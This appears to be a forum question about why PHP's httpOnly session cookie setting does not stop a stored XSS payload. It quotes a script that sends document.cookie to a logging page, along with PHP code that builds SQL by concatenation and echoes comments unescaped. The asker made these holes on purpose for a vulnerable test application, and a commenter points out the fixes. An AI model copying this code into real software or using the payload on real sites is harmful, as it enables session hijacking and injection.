# PHP session.cookie httpOnly does not work

Tags: php

I would like to prevent XSS and I set up the session.cookie_httpOnly and secure parameter true in the php.ini file. I also tested it with unsuccessful result. I injected a stored XSS script:

`<script>document.location='https://localhost/index/test1.php?stolen='+document.cookie;</script>`

And this code is always running when I open the malicious page. The test1.php just log the PHP SESSION IDs.

I have tested it on Chromium 41.0.x and Firefox 38.0

After the configuration I restarted the Apache web server.

Do I configure something wrong?

PHP code snippet:

```
<?php
session_start();
$selectCommentQuery = "SELECT comment_id, post_id, commenter,commented, message 
FROM comment WHERE post_id ='" . $post->getPost_id() . "'";
$resultOfComment =     SConnectionFactory::executeQuery($selectCommentQuery, $mysqli);

for ($index = 0; $index < $resultOfComment->num_rows; $index++) {
$comments = SDataProcess::getDataFromResult($resultOfComment);

echo "<table><tr>". "<td>" . $comments['message'] ."</td></tr>"
. "<tr><td>" . $comments['commenter'] . " - " . $comments['commented']    
. "</td>". "</tr></table>";
```

Comment: That code can't run. it's invalid javascript...

Comment: Sorry about that. I fixed it.

Comment: can you show us the `php` ?

Comment: @ampika You should properly escape data for use in queries or you open yourself up to SQL injection attacks.  Also, use `htmlspecialchars()` around any arbitrary data used in the context of HTML or folks can just post comments to inject scripts into your site.

Comment: @Brad Thanks for your suggestions, but I would like to design a vulnerable application. :) It has 2 role the users and the admin and I want to prevent session ID hijacking, but only the admin's ID should be protected.